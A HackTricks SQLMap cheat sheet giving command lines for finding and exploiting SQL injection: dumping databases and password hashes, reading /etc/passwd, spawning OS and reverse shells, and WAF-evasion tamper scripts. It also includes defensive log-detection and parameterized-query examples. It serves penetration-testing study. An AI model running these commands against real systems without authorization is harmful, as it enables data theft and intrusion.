hacktricks/pentesting-web/sql-injection/sqlmap/README.md

# SQLMap - Cheat Sheet

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? Or do you want access to the **latest version of PEASS or to download HackTricks as a PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover our exclusive collection of [**NFTs**](https://opensea.io/collection/the-peass-family) - [**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**Telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and the** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)**.**

</details>

<figure><img src="../../../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>

[**DragonJAR Security Conference is an international cybersecurity event**](https://www.dragonjarcon.org/) with more than a decade of history that will be held on 7 and 8 September 2023 in Bogotá, Colombia. It is an event with a lot of technical content, where the latest research in Spanish is presented, attracting hackers and researchers from all over the world.\
Register now at the link below and don't miss this great conference!:

{% embed url="https://www.dragonjarcon.org/" %}

## Basic arguments for SQLmap

### Generic

```bash
-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=http://127.0.0.1:8080
--union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union char
```
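The `--user-agent=SQLMAP` and `--random-agent` options above decide how visible a scan is in the web server's logs, and `--threads=10` together with `--level=5 --risk=3` turns into a burst of requests against a single parameter. As an added example (not part of the original cheat sheet), the following Python script shows the defender's side of those options: it parses a few constructed combined-format access log lines, flags any request whose User-Agent mentions sqlmap, and flags any client that sends many requests to the same path within a short window, which still catches a scan hiding behind `--random-agent`. The log lines, IP addresses and thresholds are all constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines in Apache/nginx "combined" log format (not real traffic).
# 203.0.113.5 announces itself in the User-Agent; 198.51.100.7 uses a browser
# User-Agent (as --random-agent would) but hammers one path with varied parameters.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /page.php?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '192.0.2.1 - - [10/Oct/2023:13:55:38 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:55:40 +0000] "GET /page.php?id=1%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:55:41 +0000] "GET /page.php?id=1%22 HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:55:42 +0000] "GET /page.php?id=1%29 HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:55:43 +0000] "GET /page.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:55:44 +0000] "GET /page.php?id=1%20AND%201%3D2 HTTP/1.1" 200 498 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:55:45 +0000] "GET /page.php?id=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

# One combined-format line: ip ident user [time] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], TS_FMT)
    entry["path"] = entry["path"].split("?", 1)[0]  # drop the query string for grouping
    return entry


def parse_log(lines):
    return [e for e in map(parse_line, lines) if e is not None]


def flag_user_agent(entries):
    """Requests whose User-Agent names the tool (defeated by --random-agent, but cheap)."""
    return [e for e in entries if "sqlmap" in e["ua"].lower()]


def flag_bursts(entries, threshold=5, window_seconds=10):
    """(ip, path) pairs that received >= threshold requests inside any window_seconds span."""
    times_by_key = defaultdict(list)
    for e in entries:
        times_by_key[(e["ip"], e["path"])].append(e["ts"])
    flagged = []
    for key, times in times_by_key.items():
        times.sort()
        start = 0
        for end in range(len(times)):  # sliding window over the sorted timestamps
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                flagged.append(key)
                break
    return flagged


def analyze(lines):
    """Combine both detectors and return the set of client IPs worth a closer look."""
    entries = parse_log(lines)
    by_ua = flag_user_agent(entries)
    bursts = flag_bursts(entries)
    ips = {e["ip"] for e in by_ua} | {ip for ip, _ in bursts}
    return {"user_agent_hits": by_ua, "bursts": bursts, "suspicious_ips": sorted(ips)}


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    print("Suspicious IPs:", report["suspicious_ips"])
    print("Burst (ip, path) pairs:", report["bursts"])
```

The burst detector is deliberately independent of the payload contents, so it is not defeated by tamper scripts or encoding tricks; tune `threshold` and `window_seconds` to the site's normal traffic before relying on it.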

### Retrieve information

#### Internal

```bash
--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames of DB
--passwords #Get passwords of users in DB
--privileges #Get privileges
```

#### DB data
The database contains sensitive information that is valuable to an attacker: usernames, passwords, personal details, financial data and more. During a security assessment a penetration tester needs to identify and extract this data to show its exposure.

SQL injection vulnerabilities can be exploited to access and manipulate the database directly, which lets an attacker retrieve, modify or delete data. SQLMap automates the process of detecting and exploiting SQL injection vulnerabilities.

With SQLMap a penetration tester can identify the presence of SQL injection vulnerabilities and extract data from the database. SQLMap supports many database management systems, including MySQL, Oracle, PostgreSQL and Microsoft SQL Server.

To use SQLMap, the tester provides the target URL and specifies the parameters suspected to be vulnerable to SQL injection. SQLMap then automatically detects and exploits the vulnerabilities, allowing the tester to extract data from the database.

It is important to note that SQLMap should only be used on systems that the tester has permission to test. Unauthorized use of SQLMap or any other hacking tool is illegal and unethical.

```bash
--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column
```

## Injection place

### From Burp/ZAP capture

Capture the request and create a req.txt file

```bash
sqlmap -r req.txt --current-user
```

### GET Request Injection
In some cases web applications use GET requests to retrieve data from a database, which can make them vulnerable to SQL injection. SQLMap can automate the process of detecting and exploiting SQL injection vulnerabilities in GET requests.

To perform a GET request injection with SQLMap, provide the target URL and specify the vulnerable parameter. SQLMap will then analyze the target and attempt to exploit any SQL injection vulnerability it finds.

Here is an example command to perform a GET request injection using SQLMap:

```bash
sqlmap -u "http://example.com/page.php?id=1" --dbms=mysql --level=5 --risk=3 --tamper=space2comment
```

In this command, `-u` specifies the target URL, `--dbms` the database management system, `--level` the level of tests to perform, `--risk` the risk level, and `--tamper` the tamper script to use.

SQLMap will automatically analyze the target URL, detect any SQL injection vulnerabilities and attempt to exploit them. It reports detailed information about each vulnerability it finds, such as the type of vulnerability, the payload used and the results of the exploitation.

It is important to note that performing SQL injection attacks without proper authorization is illegal and unethical. Always ensure that you have proper authorization and permission before conducting any penetration testing activities.

```bash
sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id
```

### POST Request Injection
In some cases the target application uses the POST method to send data to the server; login forms and data submission forms are common examples. In such cases an attacker can exploit SQL injection vulnerabilities by injecting SQL statements into the POST parameters.

To perform a POST request injection, use the `--data` option of SQLMap to specify the POST data. The `--data` option takes a string in the format `param1=value1&param2=value2`, where `param1` and `param2` are the names of the POST parameters and `value1` and `value2` are the corresponding values.

For example, if the target application has a login form with the two parameters `username` and `password`, you can use the following command to perform a POST request injection:

```bash
sqlmap -u "http://example.com/login" --method POST --data "username=admin&password=test"
```

In this example SQLMap sends a POST request to `http://example.com/login` with the `username` parameter set to `admin` and the `password` parameter set to `test`, then analyzes the responses to identify any SQL injection vulnerability.

Remember to properly encode the values of the POST parameters so that the server interprets the request correctly. URL encoding or another encoding appropriate for the application can be used for this purpose.

```bash
sqlmap -u "http://example.com" --data "username=*&password=*"
```

### Injections in Headers and other HTTP Methods
In addition to the URL parameters, SQL injection can also occur in other parts of the HTTP request, such as headers and the bodies of other HTTP methods. These injection points can be exploited to manipulate the behavior of the web application and potentially extract sensitive information from the database.

#### Header Injection

Header injection occurs when user-controlled input is not properly sanitized and ends up in a value taken from the HTTP headers. Attackers can inject content through headers, which can lead to various security vulnerabilities, including cross-site scripting (XSS) and remote code execution (RCE).

To test for header injection vulnerabilities you can use SQLMap's `--headers` option, which lets you specify custom headers to be sent with the HTTP request. By placing the injection marker in a header value you can check whether the application is vulnerable to injection through that header.

#### Other HTTP Methods

SQL injection can also occur through other HTTP methods such as POST, PUT and DELETE. These methods are commonly used for data manipulation and can be vulnerable to injection if user input is not properly sanitized.

To test for SQL injection vulnerabilities in other HTTP methods, use SQLMap's `--method` option, which sets the HTTP method used during testing. By placing the injection marker in the request body or parameters of these methods you can check whether the application is vulnerable to SQL injection.

It is important to thoroughly test all possible injection points in the HTTP request to ensure the security of the web application.

```bash
#Inside cookie
sqlmap -u "http://example.com" --cookie "mycookies=*"
#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"
#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
#The injection is located at the '*'
```

### Indicate string when injection is successful

When performing SQL injection tests it is important to determine whether an injection was successful or not. One way to do this is to indicate a specific string that is displayed only when the injected condition is true.

To achieve this, use the `--string` option of SQLMap. This option specifies a string that should be present in the response when the injection is successful.

Here is an example command that demonstrates the usage of the `--string` option:

```bash
sqlmap -u "http://example.com/vulnerable.php?id=1" --string "Injection successful"
```

In this example SQLMap sends requests to the specified URL with different payloads to test for SQL injection vulnerabilities. If the response contains the string "Injection successful", SQLMap treats that response as a TRUE page.

By indicating a specific string you can easily tell whether the injection was successful or not, allowing you to proceed with further exploitation or move on to other targets.

```bash
--string="string_showed_when_TRUE"
```
### Eval

**Sqlmap** allows the use of `-e` or `--eval` to process each payload with a Python one-liner before sending it. This makes it very easy and fast to transform the payload in a custom way before it is sent. In the following example the **flask cookie session** is signed by flask with the known secret before sending it:

```bash
sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump
```
### Shell

#### Introduction
The shell is a command-line interface that allows users to interact with the operating system. It provides a way to execute commands, navigate the file system, and manage processes. In the context of penetration testing, the shell is a powerful tool that can be used to gain unauthorized access to a target system.

#### Types of Shells

There are different types of shells available, each with its own features and capabilities. Some common types of shells include:

- **Bourne Shell (sh):** The Bourne shell is the original Unix shell and is still widely used today. It provides basic functionality and is compatible with most Unix-like systems.
- **Bash (Bourne Again SHell):** Bash is a popular shell that is compatible with the Bourne shell. It includes additional features such as command history, tab completion, and job control.
- **C Shell (csh):** The C shell is another Unix shell that provides a C-like syntax and additional features such as command-line editing and history.
- **Korn Shell (ksh):** The Korn shell is an enhanced version of the Bourne shell with additional features such as command-line editing, history, and job control.
- **Zsh (Z Shell):** Zsh is a powerful shell that includes features from other shells such as Bash and Korn shell. It provides advanced customization options and is highly extensible.

#### Using the Shell for Penetration Testing

In penetration testing, the shell is often used to execute commands on a target system and perform various tasks such as reconnaissance, privilege escalation, and data exfiltration. Here are some common use cases for using the shell in penetration testing:

- **Command Execution:** The shell can be used to execute commands on a target system, allowing the tester to gather information, manipulate files, and perform other actions.
- **File System Navigation:** The shell provides commands for navigating the file system, allowing the tester to explore directories, list files, and access sensitive data.
- **Process Management:** The shell allows the tester to manage processes on the target system, including starting, stopping, and monitoring processes.
- **Privilege Escalation:** The shell can be used to escalate privileges on a target system, gaining higher levels of access and control.
- **Data Exfiltration:** The shell can be used to exfiltrate data from a target system, allowing the tester to retrieve sensitive information.

#### Conclusion
The shell is a powerful tool in penetration testing, providing the ability to execute commands, navigate the file system, and manage processes. Understanding the different types of shells and their capabilities is essential for effective penetration testing. By leveraging the power of the shell, testers can identify vulnerabilities, exploit them, and assess the security of target systems.

```bash
#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami
#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
```

### Read File
The `--file-read` option of SQLMap reads files from the database server's file system through the injection. This can be useful for retrieving sensitive information stored in files.

To use this option, provide the path of the file you want to read. SQLMap will then attempt to read the contents of the file and display them in the output.

Here is an example command:

```bash
sqlmap -u "http://example.com/vulnerable.php?id=1" --file-read="/etc/passwd"
```

In this example SQLMap sends requests to the vulnerable URL `http://example.com/vulnerable.php?id=1` and attempts to read the contents of the `/etc/passwd` file.

Keep in mind that this technique does not work in all cases, since it depends on the privileges of the database user and on the configuration of the database server (for example, MySQL's `FILE` privilege and `secure_file_priv` setting). Additionally, use this technique responsibly and only on systems that you have proper authorization to test.

### Crawl a website with SQLmap and auto-exploit
SQLmap is a powerful automated SQL injection tool that can crawl a website and automatically exploit the SQL injection vulnerabilities it finds. The steps to crawl and auto-exploit a site with SQLmap are:

1. **Crawl the website**
   - Use the `-u` parameter to specify the URL of the target site, e.g. `sqlmap -u http://www.example.com`
   - SQLmap automatically scans the target site looking for possible SQL injection vulnerabilities
   - Once a vulnerability is found, SQLmap offers further options to act on it

2. **Exploit the vulnerability automatically**
   - Use the `--dbs` parameter to list the databases on the target, e.g. `sqlmap -u http://www.example.com --dbs`
   - Use the `-D` parameter to select the database to work on, e.g. `sqlmap -u http://www.example.com -D dbname`
   - Use the `--tables` parameter to list the tables of the selected database, e.g. `sqlmap -u http://www.example.com -D dbname --tables`
   - Use the `-T` parameter to select the table to work on, e.g. `sqlmap -u http://www.example.com -D dbname -T tablename`
   - Use the `--dump` parameter to retrieve the data of the selected table, e.g. `sqlmap -u http://www.example.com -D dbname -T tablename --dump`

By following these steps you can use SQLmap to crawl a website and exploit SQL injection vulnerabilities to obtain sensitive data from the target database. Note that before any kind of penetration test you must have obtained legal authorization and must comply with the applicable laws and regulations.

```bash
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
#--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
#--crawl = how deep you want to crawl a site
#--forms = Parse and test forms
```

### Second Order Injection
Second order injection is a type of SQL injection in which the user input is not used directly in a SQL query but is stored in the database and used in a later query. It happens when stored input is retrieved and inserted into a query without proper sanitization or validation, because the application trusts data that came from its own database.

For example, suppose a web application lets users submit comments, which are stored in a database. Later, when displaying these comments, the application retrieves them and includes them in a SQL query without proper sanitization. An attacker can then craft their comment so that it contains SQL code, which is executed when that later query runs.

To exploit a second order injection vulnerability, an attacker typically needs to get their input stored in the database and then trigger the execution of the query that uses the stored input. This can be done either by making the application perform the query or by waiting for a legitimate user to trigger it.

To prevent second order injection, properly sanitize and validate all user input before using it in a query. This applies both to input that is used directly in a query and to input that is stored in the database for later use. Additionally, using prepared statements or parameterized queries protects against second order injection by keeping the query logic separate from the (stored) user input.

```bash
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt --dbms MySQL --second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" --dbs
```
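The prevention paragraph above says that parameterized queries protect against second order injection by keeping the query logic separate from the stored input. The following Python/sqlite3 example, added here and not part of the original page, models the comment scenario described above: the first request stores an author name safely, and the second request looks that name up again either by splicing the stored value into SQL (the vulnerable second order pattern) or by binding it as a parameter. The tables, rows and the crafted author value are constructed for the example.

```python
import sqlite3

# Constructed value a user could submit as their display name in the first request.
# It is stored harmlessly; the damage only happens when it is reused as SQL later.
CRAFTED_AUTHOR = "x' OR '1'='1"


def make_db():
    """In-memory database with two users and an empty comments table (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("CREATE TABLE comments (id INTEGER PRIMARY KEY, author TEXT, body TEXT)")
    conn.executemany("INSERT INTO users (name) VALUES (?)", [("alice",), ("bob",)])
    return conn


def store_comment(conn, author, body):
    """First request: parameterized, so any author string is stored verbatim without error."""
    cur = conn.execute("INSERT INTO comments (author, body) VALUES (?, ?)", (author, body))
    return cur.lastrowid


def stored_author(conn, comment_id):
    """Read the author name back out of the database (this value is attacker-controlled)."""
    row = conn.execute("SELECT author FROM comments WHERE id = ?", (comment_id,)).fetchone()
    return row[0]


def lookup_author_vulnerable(conn, comment_id):
    """Second request, vulnerable: trusts the stored value because it came from 'our' database."""
    author = stored_author(conn, comment_id)
    sql = f"SELECT name FROM users WHERE name = '{author}' ORDER BY name"  # stored input becomes SQL
    return [r[0] for r in conn.execute(sql)]


def lookup_author_safe(conn, comment_id):
    """Second request, hardened: the stored value is bound as a parameter and can only be data."""
    author = stored_author(conn, comment_id)
    rows = conn.execute("SELECT name FROM users WHERE name = ? ORDER BY name", (author,))
    return [r[0] for r in rows]


def demo():
    """Run both lookups against a crafted and a normal stored author and return the results."""
    conn = make_db()
    crafted_id = store_comment(conn, CRAFTED_AUTHOR, "nice post")
    normal_id = store_comment(conn, "alice", "thanks")
    return {
        "vulnerable_crafted": lookup_author_vulnerable(conn, crafted_id),  # every user leaks
        "safe_crafted": lookup_author_safe(conn, crafted_id),              # no user is named x' OR ...
        "vulnerable_normal": lookup_author_vulnerable(conn, normal_id),
        "safe_normal": lookup_author_safe(conn, normal_id),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The point to notice is that the insert in `store_comment` is already parameterized and still does not make the application safe: the value has to be bound again at every later use, which is exactly what sqlmap's `--second-order` option is testing for.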

[**Read this post**](second-order-injection-sqlmap.md) **about how to perform simple and complex second order injections with sqlmap.**

## Practice Lab

* Learn to use sqlmap in the **THM room**

{% embed url="https://tryhackme.com/room/sqlmap" %}

## Customizing Injection

### Set a suffix

```bash
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
```

### Prefix
```bash
python sqlmap.py -u "http://example.com/?id=1" -p id --prefix="') "
```

### Helping boolean injection finding
Boolean-based SQL injection exploits applications that do not properly sanitize user input before building SQL queries. By injecting carefully crafted boolean expressions into an input, an attacker makes the application's response differ depending on whether the expression is true or false, and can use that difference to extract information from the database.

To identify boolean-based SQL injection vulnerabilities you can use tools like SQLMap, an open-source penetration testing tool that automates the detection and exploitation of SQL injection flaws.

The steps to find boolean injection with SQLMap are:

1. **Identify the target**: Determine the URL of the web application that you want to test for boolean-based SQL injection.

2. **Launch SQLMap**: Open a terminal and run SQLMap with the appropriate command-line options. For example:

   ```bash
   sqlmap -u <target_url> --level=5 --risk=3 --technique=B
   ```

   - The `-u` option specifies the target URL.
   - The `--level` option sets the level of tests to be performed (5 is the highest).
   - The `--risk` option sets the risk level of the tests to be performed (3 is the highest).
   - The `--technique` option specifies the injection technique to use (B for boolean-based).

3. **Analyze the results**: SQLMap sends various payloads and compares the responses to determine whether the application is vulnerable to boolean-based SQL injection.

4. **Exploit the vulnerability**: If SQLMap identifies a boolean-based SQL injection vulnerability, it can automatically exploit it to extract data from the database. Additional options can be given to customize the exploitation.

By following these steps you can identify and exploit boolean-based SQL injection vulnerabilities in web applications. However, only perform these activities on systems that you have proper authorization to test.

```bash
# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch
```
### Tamper

Remember that **you can create your own tamper in Python** and it's very simple. You can find a tamper example in the [Second Order Injection page here](second-order-injection-sqlmap.md).

```bash
--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper
```

| Tamper | Description |
| ---------------------------- | ---------------------------------------------------------------------------------------------------------------------------------- |
| apostrophemask.py | Replaces the apostrophe character with its UTF-8 full width counterpart |
| apostrophenullencode.py | Replaces the apostrophe character with its illegal double unicode counterpart |
| appendnullbyte.py | Appends an encoded NULL byte character at the end of the payload |
| base64encode.py | Base64-encodes all characters in a given payload |
| between.py | Replaces the greater than operator ('>') with 'NOT BETWEEN 0 AND #' |
| bluecoat.py | Replaces the space character after a SQL statement with a valid random blank character, then replaces the character '=' with the LIKE operator |
| chardoubleencode.py | Double URL-encodes all characters in a given payload (not processing already encoded ones) |
| commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' |
| commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' |
| concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' |
| charencode.py | URL-encodes all characters in a given payload (not processing already encoded ones) |
| charunicodeencode.py | Unicode-URL-encodes the non-encoded characters in a given payload (not processing already encoded ones). "%u0022" |
| charunicodeescape.py | Unicode-escapes the non-encoded characters in a given payload (not processing already encoded ones). "\u0022" |
| equaltolike.py | Replaces all occurrences of the equals operator ('=') with the LIKE operator |
| escapequotes.py | Slash-escapes quotes (' and ") |
| greatest.py | Replaces the greater than operator ('>') with its 'GREATEST' counterpart |
| halfversionedmorekeywords.py | Adds a versioned MySQL comment before each keyword |
| ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' |
| modsecurityversioned.py | Wraps the complete query in a versioned comment |
| modsecurityzeroversioned.py | Wraps the complete query in a zero-versioned comment |
| multiplespaces.py | Adds multiple spaces around SQL keywords |
| nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for defeating simple replacement filters (e.g. .replace("SELECT", "")) |
| percentage.py | Adds a percentage sign ('%') in front of each character |
| overlongutf8.py | Converts all characters in a given payload to overlong UTF-8 (not processing already encoded ones) |
| randomcase.py | Replaces each keyword character with a random case value |
| randomcomments.py | Adds random comments to SQL keywords |
| securesphere.py | Appends a specially crafted string |
| sp\_password.py | Appends 'sp\_password' to the end of the payload for automatic obfuscation from DBMS logs |
| space2comment.py | Replaces the space character (' ') with comments |
| space2dash.py | Replaces the space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') |
| space2hash.py | Replaces the space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
| space2morehash.py | Replaces the space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
| space2mssqlblank.py | Replaces the space character (' ') with a random blank character from a valid set of alternate characters |
| space2mssqlhash.py | Replaces the space character (' ') with a pound character ('#') followed by a new line ('\n') |
| space2mysqlblank.py | Replaces the space character (' ') with a random blank character from a valid set of alternate characters |
| space2mysqldash.py | Replaces the space character (' ') with a dash comment ('--') followed by a new line ('\n') |
| space2plus.py | Replaces the space character (' ') with a plus ('+') |
| space2randomblank.py | Replaces the space character (' ') with a random blank character from a valid set of alternate characters |
| symboliclogical.py | Replaces the AND and OR logical operators with their symbolic counterparts (&& and \|\|) |
| unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT |
| unmagicquotes.py | Replaces the quote character (') with the multi-byte combo %bf%27 together with a generic comment at the end (to make it work) |
| uppercase.py | Replaces each keyword character with its upper case value ('INSERT') |
| varnish.py | Appends an HTTP header 'X-originating-IP' |
| versionedkeywords.py | Encloses each non-function keyword in a versioned MySQL comment |
| versionedmorekeywords.py | Encloses each keyword in a versioned MySQL comment |
| xforwardedfor.py | Appends a fake HTTP header 'X-Forwarded-For' |